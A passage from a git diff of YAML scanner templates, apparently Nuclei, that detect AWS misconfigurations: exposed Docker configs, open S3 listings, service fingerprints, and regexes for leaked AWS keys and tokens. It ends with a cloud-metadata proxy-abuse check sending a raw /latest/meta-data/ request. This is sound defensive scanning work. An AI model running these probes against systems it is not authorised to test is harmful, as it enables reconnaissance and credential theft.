490a004630440220419fa6ed9cc0aeb4ea0fce6bfd87de25db115cd5fb3ead5589d7b1f316621aaf02200c591b0c798e7a2cb6961a14eb5061d6a6bd4dd3e015d58fb2b87ce2538a0b44:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/amazon-docker-config-disclosure-278.yaml b/poc/aws/amazon-docker-config-disclosure-278.yaml deleted file mode 100644 index 7e0c16546d..0000000000 --- a/poc/aws/amazon-docker-config-disclosure-278.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: amazon-docker-config-disclosure - -info: - name: Dockerrun AWS Configuration Exposure - author: pdteam - severity: medium - tags: config,exposure,aws,devops - -requests: - - method: GET - path: - - '{{BaseURL}}/Dockerrun.aws.json' - matchers: - - type: word - words: - - 'AWSEBDockerrunVersion' - - 'containerDefinitions' - condition: and diff --git a/poc/aws/amazon-docker-config-disclosure.yaml b/poc/aws/amazon-docker-config-disclosure.yaml index 8724431c98..87ab75f1f6 100644 --- a/poc/aws/amazon-docker-config-disclosure.yaml +++ b/poc/aws/amazon-docker-config-disclosure.yaml @@ -5,15 +5,9 @@ info: severity: medium tags: config,exposure,aws,devops requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - raw: - - | - GET /Dockerrun.aws.json HTTP/1.1 - Host: {{Subdomains}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' matchers: - type: word words: diff --git a/poc/aws/amazon-docker-config.yaml b/poc/aws/amazon-docker-config.yaml new file mode 100644 index 0000000000..4eaa175dfc --- /dev/null +++ b/poc/aws/amazon-docker-config.yaml @@ -0,0 +1,18 @@ +id: amazon-docker-config + +info: + name: Dockerrun AWS Configuration Exposure + author: pdteam + severity: medium + tags: config,exposure,aws,devops + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and diff --git a/poc/aws/amazon-mws-auth-token-11845.yaml b/poc/aws/amazon-mws-auth-token-11845.yaml index 8ed5b31604..0ab5703b9c 100644 --- a/poc/aws/amazon-mws-auth-token-11845.yaml +++ b/poc/aws/amazon-mws-auth-token-11845.yaml @@ -1,15 +1,11 @@ id: amazon-mws-auth-token-value info: - name: Amazon MWS Authentication Token - Detect + name: Amazon MWS Auth Token author: gaurang severity: medium - description: Amazon MWS authentication token was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 tags: token,file,amazon,auth + file: - extensions: - all @@ -18,6 +14,3 @@ file: - type: regex regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100a22e9ab4357449ff0b0d0e1d56fd2a2a815900eb260c13cdc8ca5b4904508d76022030e701c98fff70a3c0e8174fe27c30c87c60b0a4acdc97555a71970ab6e5e83a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/amazon-mws-auth-token-282.yaml b/poc/aws/amazon-mws-auth-token-282.yaml index eb41de1dae..457df905b0 100644 --- a/poc/aws/amazon-mws-auth-token-282.yaml +++ b/poc/aws/amazon-mws-auth-token-282.yaml @@ -4,9 +4,11 @@ info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info + metadata: + max-request: 1 tags: exposure,token,aws,amazon,auth -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -16,3 +18,5 @@ requests: part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/amazon-mws-auth-token-283.yaml b/poc/aws/amazon-mws-auth-token-283.yaml index 457df905b0..28e8063f5e 100644 --- a/poc/aws/amazon-mws-auth-token-283.yaml +++ b/poc/aws/amazon-mws-auth-token-283.yaml @@ -1,22 +1,15 @@ id: amazon-mws-auth-token - info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - metadata: - max-request: 1 - tags: exposure,token,aws,amazon,auth - -http: + tags: exposure,token,aws +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-access-id-618.yaml b/poc/aws/aws-access-id-618.yaml deleted file mode 100644 index 1bf83e581c..0000000000 --- a/poc/aws/aws-access-id-618.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: aws-access-key - -info: - name: AWS Access Key ID - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/poc/aws/aws-access-id-620.yaml b/poc/aws/aws-access-id-620.yaml deleted file mode 100644 index 59db59bd29..0000000000 --- a/poc/aws/aws-access-id-620.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: aws-access-key - -info: - name: AWS Access Key ID - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/poc/aws/aws-access-id.yaml b/poc/aws/aws-access-id.yaml index f05c27ae8e..1bf83e581c 100644 --- a/poc/aws/aws-access-id.yaml +++ b/poc/aws/aws-access-id.yaml @@ -1,15 +1,11 @@ id: aws-access-key info: - name: Amazon Web Services Access Key ID - Detect + name: AWS Access Key ID author: gaurang severity: info - description: Amazon Web Services Access Key ID token was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 tags: token,file + file: - extensions: - all @@ -18,6 +14,3 @@ file: - type: regex regex: - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022001180031643147e369ad54d397f6e1ec99e061e1a771b8ec6b9f024bb97300a7022100b5b3b3027d3e8edea6822f05c18070f5cbd64b111c6ac7aa37e3603fcb4b08ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-access-key-value-624.yaml b/poc/aws/aws-access-key-value-624.yaml new file mode 100644 index 0000000000..5cb8846e08 --- /dev/null +++ b/poc/aws/aws-access-key-value-624.yaml @@ -0,0 +1,22 @@ +id: aws-access-key-value + +info: + name: AWS Access Key ID Value + author: Swissky + severity: info + metadata: + max-request: 1 + tags: exposure,token,aws,amazon + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" + +# digest: 4a0a004730450220593a92026bc21a26687f6e78f52259873c5643010bf2bf67aec0ad4e469ce40a022100bb56301e5df9b095b39838c76cc5cf37b469e84c9e488be380aa9f1dbfc3df00:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-bucket-service-628.yaml b/poc/aws/aws-bucket-service-628.yaml deleted file mode 100644 index be2129c807..0000000000 --- a/poc/aws/aws-bucket-service-628.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: aws-bucket-service - -info: - name: Detect websites using AWS bucket storage - author: pdteam - severity: info - metadata: - max-request: 1 - tags: aws,tech,bucket - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(header), 'x-amz-bucket') - - contains(tolower(header), 'x-amz-request') - - contains(tolower(header), 'x-amz-id') - - contains(tolower(header), 'amazons3') - condition: or - - - type: dsl - dsl: - - contains(tolower(header), 'x-guploader-uploadid') - negative: true - -# digest: 4a0a00473045022100f73a2c41da2dc0ac4cb9dd81f1a0637b1124ec077a35301154e14bfc8e582c2202204363b40659aa173eb2bf958820e33aa56563658585a189da5f630a39121e10e2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-bucket-service.yaml b/poc/aws/aws-bucket-service.yaml new file mode 100644 index 0000000000..fb12d1953b --- /dev/null +++ b/poc/aws/aws-bucket-service.yaml @@ -0,0 +1,27 @@ +id: aws-bucket-service + +info: + name: Detect websites using AWS bucket storage + author: pdteam + severity: info + tags: aws,tech,bucket + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-amz-bucket') + - contains(tolower(all_headers), 'x-amz-request') + - contains(tolower(all_headers), 'x-amz-id') + - contains(tolower(all_headers), 'amazons3') + condition: or + + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-guploader-uploadid') + negative: true diff --git a/poc/aws/aws-cloudfront-service-634.yaml b/poc/aws/aws-cloudfront-service-634.yaml index 2e4626000b..26ab05d613 100644 --- a/poc/aws/aws-cloudfront-service-634.yaml +++ b/poc/aws/aws-cloudfront-service-634.yaml @@ -5,11 +5,9 @@ info: author: jiheon-dev severity: info description: Detect websites using AWS cloudfront service - metadata: - max-request: 1 tags: aws,tech,service -http: +requests: - method: GET path: - "{{BaseURL}}" @@ -18,9 +16,7 @@ http: - type: dsl condition: or dsl: - - "contains(tolower(header), 'x-cache: hit from cloudfront')" - - "contains(tolower(header), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(header), 'x-cache: miss from cloudfront')" - - "contains(tolower(header), 'x-cache: error from cloudfront')" - -# digest: 490a0046304402205194b5f1c14b4bbbe7a92308b198368f53a70c03cb4b4313bcc1ba95f7ed2d55022029fdac767b00d013e9f912c931baee9e352913fc826b8454e788c3c8c6ea5dd3:922c64590222798bb761d5b6d8e72950 + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/poc/aws/aws-cloudfront-service-635.yaml b/poc/aws/aws-cloudfront-service-635.yaml deleted file mode 100644 index 26ab05d613..0000000000 --- a/poc/aws/aws-cloudfront-service-635.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aws-cloudfront-service - -info: - name: AWS Cloudfront service detection - author: jiheon-dev - severity: info - description: Detect websites using AWS cloudfront service - tags: aws,tech,service - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - condition: or - dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/poc/aws/aws-cognito-638.yaml b/poc/aws/aws-cognito-638.yaml deleted file mode 100644 index bbbd1d4b26..0000000000 --- a/poc/aws/aws-cognito-638.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aws-cognito-pool - -info: - name: AWS Cognito Pool ID - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "ap-northeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-northeast-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-southeast-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-southeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-south-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ca-central-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ca-central-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-north-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-east-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" \ No newline at end of file diff --git a/poc/aws/aws-ecs-container-agent-tasks-641.yaml b/poc/aws/aws-ecs-container-agent-tasks-641.yaml deleted file mode 100644 index 7f34b5c337..0000000000 --- a/poc/aws/aws-ecs-container-agent-tasks-641.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-ecs-container-agent-tasks - -info: - name: aws-ecs-container-agent-tasks - author: dogasantos - severity: info - tags: aws,docker,ec2 - description: Aws container metadata content - reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect - -requests: - - method: GET - path: - - "{{BaseURL}}/v1/metadata" - - "{{BaseURL}}/v1/tasks" - - matchers-condition: and - matchers: - - type: word - words: - - "arn:aws:ecs" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/aws/aws-elastic-beanstalk-detect-644.yaml b/poc/aws/aws-elastic-beanstalk-detect-644.yaml index e77c6060ce..00c2a3d8da 100644 --- a/poc/aws/aws-elastic-beanstalk-detect-644.yaml +++ b/poc/aws/aws-elastic-beanstalk-detect-644.yaml @@ -1,11 +1,14 @@ id: elastic-beanstalk-detect + info: name: AWS Elastic Beanstalk Detect author: pussycat0x severity: info + metadata: + max-request: 1 tags: aws,tech,beanstalk -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -28,3 +31,5 @@ requests: group: 1 regex: - '([A-Za-z -]+)<\/title>' + +# digest: 4a0a0047304502205248c4f04864e4ced28b39f71a3a85e4985860aba6b016c3a062c7ab1977aae5022100c886094c2eebe7cb056a7f0ad732908fe42e17837b520a66924972d7f5a8acd6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-elastic-beanstalk-detect.yaml b/poc/aws/aws-elastic-beanstalk-detect.yaml deleted file mode 100644 index 9c88c7b2ae..0000000000 --- a/poc/aws/aws-elastic-beanstalk-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: elastic-beanstalk-detect - -info: - name: AWS Elastic Beanstalk Detect - author: pussycat0x - severity: info - tags: aws,tech,beanstalk - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>' - - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '<title>([A-Za-z -]+)<\/title>' diff --git a/poc/aws/aws-object-listing-646.yaml b/poc/aws/aws-object-listing-646.yaml index 2748d21094..53d6e67684 100644 --- a/poc/aws/aws-object-listing-646.yaml +++ b/poc/aws/aws-object-listing-646.yaml @@ -4,7 +4,8 @@ info: name: AWS bucket with Object listing author: pdteam severity: low - reference: https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 + reference: + - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 tags: aws,misconfig,bucket requests: diff --git a/poc/aws/aws-object-listing.yaml b/poc/aws/aws-object-listing.yaml index 53d6e67684..c533985d46 100644 --- a/poc/aws/aws-object-listing.yaml +++ b/poc/aws/aws-object-listing.yaml @@ -6,25 +6,28 @@ info: severity: low reference: - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 + metadata: + max-request: 1 tags: aws,misconfig,bucket -requests: +http: - method: GET path: - "{{BaseURL}}" max-size: 1000 + matchers-condition: and matchers: - type: word + part: body words: - '<ListBucketResult xmlns=' - part: body - type: word + part: header words: - application/xml - part: header extractors: - type: regex @@ -32,3 +35,5 @@ requests: group: 1 regex: - '<Name>([a-z0-9-._]+)' + +# digest: 490a004630440220241734b1058c61b2680b91381de5ef764c8084dafaf90bb34937bb487c02a09a0220186a3e1705a656fc3c537017e087c1a47b0f47c15cf059ddbc012e0c2e53e1d6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-opensearch-login-649.yaml b/poc/aws/aws-opensearch-login-649.yaml new file mode 100644 index 0000000000..ffd32b7e76 --- /dev/null +++ b/poc/aws/aws-opensearch-login-649.yaml @@ -0,0 +1,24 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/aws/aws-opensearch-login-650.yaml b/poc/aws/aws-opensearch-login-650.yaml deleted file mode 100644 index 14f111d73a..0000000000 --- a/poc/aws/aws-opensearch-login-650.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-opensearch-login - -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: - - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws - -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/aws/aws-opensearch-login.yaml b/poc/aws/aws-opensearch-login.yaml index ffd32b7e76..14f111d73a 100644 --- a/poc/aws/aws-opensearch-login.yaml +++ b/poc/aws/aws-opensearch-login.yaml @@ -5,7 +5,8 @@ info: author: Higor Melgaço (eremit4) severity: medium description: Searches for the AWS OpenSearch login page - reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ tags: panel,opensearch,aws requests: diff --git a/poc/aws/aws-redirect-651.yaml b/poc/aws/aws-redirect-651.yaml new file mode 100644 index 0000000000..010dbbfeca --- /dev/null +++ b/poc/aws/aws-redirect-651.yaml @@ -0,0 +1,24 @@ +id: aws-redirect + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: info + reference: https://link.medium.com/fgXKJHR9P7 + tags: aws + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/poc/aws/aws-redirect-652.yaml b/poc/aws/aws-redirect-652.yaml index 1826635a49..5139ec2cf7 100644 --- a/poc/aws/aws-redirect-652.yaml +++ b/poc/aws/aws-redirect-652.yaml @@ -4,21 +4,28 @@ info: name: Subdomain takeover AWS S3 author: manikanta a.k.a @secureitmania severity: info - reference: https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover + reference: + - https://link.medium.com/fgXKJHR9P7 + metadata: + max-request: 1 + tags: aws,takeover,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}' redirects: false + matchers-condition: and matchers: - type: status status: - 307 + - type: word words: - 'Location: https://aws.amazon.com/s3/' part: header + +# digest: 490a00463044022038d49c43c034741635f5906995d2086bea2c3ccb11f7ac3989e134be6dad6c4c0220240bbd1c05f5f3e7da66d82eb890b742893949997923f19c220f83a45fe5640c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/awstats-config-656.yaml b/poc/aws/awstats-config-656.yaml new file mode 100644 index 0000000000..32342ff234 --- /dev/null +++ b/poc/aws/awstats-config-656.yaml @@ -0,0 +1,36 @@ +id: awstats-config + +info: + name: AWStats Config - Detect + author: sheikhrishad + severity: info + description: AWStats configuration information was detected. + reference: https://www.awstats.org/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 2 + tags: config,exposure,awstats + +http: + - method: GET + path: + - "{{BaseURL}}/awstats/" + - "{{BaseURL}}/awstats.conf" + + matchers: + - type: word + words: + - "AWSTATS CONFIGURE" + - "MAIN SETUP SECTION" + condition: and + + - type: word + words: + - "Index of /awstats" + - "Parent Directory" + condition: and + +# digest: 4a0a0047304502206b7aad743ab80b0e99d36916f873a93b404aef56265091294d37d197bf03cf9b0221008d3f8603824fc2ddb96488acbb6699bdfd4e0fa0b46d2a1cef249ecc8a3f84be:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/awstats-config.yaml b/poc/aws/awstats-config.yaml deleted file mode 100644 index 9a4cb3cb84..0000000000 --- a/poc/aws/awstats-config.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: awstats-config - -info: - name: AWStats config - author: sheikhrishad - severity: info - tags: config,exposure,awstats - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats/" - - "{{BaseURL}}/awstats.conf" - - matchers: - - type: word - words: - - "AWSTATS CONFIGURE" - - "MAIN SETUP SECTION" - condition: and - - - type: word - words: - - "Index of /awstats" - - "Parent Directory" - condition: and \ No newline at end of file diff --git a/poc/aws/awstats-script-657.yaml b/poc/aws/awstats-script-657.yaml new file mode 100644 index 0000000000..9a81b722f3 --- /dev/null +++ b/poc/aws/awstats-script-657.yaml @@ -0,0 +1,29 @@ +id: awstats-script + +info: + name: AWStats script + author: sheikhrishad + severity: info + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats.pl" + - "{{BaseURL}}/logs/awstats.pl" + - "{{BaseURL}}/webstats/awstats.pl" + + matchers-condition: and + matchers: + - type: word + words: + - "Do not remove this line" + + - type: word + words: + - "application/x-perl" + part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/aws/awstats-script-658.yaml b/poc/aws/awstats-script-658.yaml deleted file mode 100644 index 3631c6a328..0000000000 --- a/poc/aws/awstats-script-658.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: awstats-script - -info: - name: AWStats script - author: sheikhrishad - severity: info - tags: config,exposure,awstats - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats.pl" - - "{{BaseURL}}/logs/awstats.pl" - - "{{BaseURL}}/webstats/awstats.pl" - - matchers-condition: and - matchers: - - type: word - words: - - "Do not remove this line" - - - type: word - part: header - words: - - "application/x-perl" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/aws/awstats-script.yaml b/poc/aws/awstats-script.yaml index 9a81b722f3..adba3a58d9 100644 --- a/poc/aws/awstats-script.yaml +++ b/poc/aws/awstats-script.yaml @@ -1,12 +1,20 @@ id: awstats-script info: - name: AWStats script + name: AWStats Script Config - Detect author: sheikhrishad severity: info - tags: config,exposure + description: AWStats configuration information was detected. + reference: https://www.awstats.org/docs/awstats_setup.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 3 + tags: config,exposure,awstats -requests: +http: - method: GET path: - "{{BaseURL}}/awstats.pl" @@ -20,10 +28,12 @@ requests: - "Do not remove this line" - type: word + part: header words: - "application/x-perl" - part: header - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a0046304402204f71ad3871161383a0092af92b73b53f55d28c9d90c224436c41e0af70ae4e7502205f6ac0ca14d346bce6b6618733b105f79b64752ef8b1af2b39da2588676e35ef:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/ec2-detection-7162.yaml b/poc/aws/ec2-detection-7162.yaml deleted file mode 100644 index 2c3025f2eb..0000000000 --- a/poc/aws/ec2-detection-7162.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: ec2-detection - -info: - name: AWS EC2 detection - author: melbadry9 - severity: info - tags: dns,ec2,aws - reference: https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state - -dns: - - name: "{{FQDN}}" - type: CNAME - - extractors: - - type: regex - regex: - - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" diff --git a/poc/aws/ec2-detection-7163.yaml b/poc/aws/ec2-detection-7163.yaml new file mode 100644 index 0000000000..9ffb7ee163 --- /dev/null +++ b/poc/aws/ec2-detection-7163.yaml @@ -0,0 +1,24 @@ +id: ec2-detection + +info: + name: AWS EC2 Detection + author: melbadry9 + severity: info + description: Amazon Elastic Compute Cloud (EC2) detected. + reference: + - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state + classification: + cwe-id: CWE-200 + tags: dns,ec2,aws + +dns: + - name: "{{FQDN}}" + type: CNAME + + extractors: + - type: regex + regex: + - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" + - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" + +# Enhanced by mp on 2022/03/14 diff --git a/poc/aws/metadata-aws-8812.yaml b/poc/aws/metadata-aws-8812.yaml index 3a5e11cb49..6674f52436 100644 --- a/poc/aws/metadata-aws-8812.yaml +++ b/poc/aws/metadata-aws-8812.yaml @@ -2,29 +2,32 @@ id: metadata-service-aws # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Amazon AWS Metadata Service Check - author: sullo + author: sullo,DhiyaneshDk severity: critical - description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + description: The host is configured as a proxy which allows access to the metadata provided by a cloud provider such as AWS or OVH. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - tags: exposure,proxy,aws,amazon,misconfig,metadata + - https://twitter.com/Random_Robbie/status/1268186743657947137 + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery# classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 + metadata: + max-request: 4 + tags: exposure,proxy,aws,amazon,misconfig,metadata -requests: +http: - raw: - |+ GET http://{{hostval}}/latest/meta-data/ HTTP/1.1 @@ -32,9 +35,10 @@ requests: payloads: hostval: - - aws.interact.sh 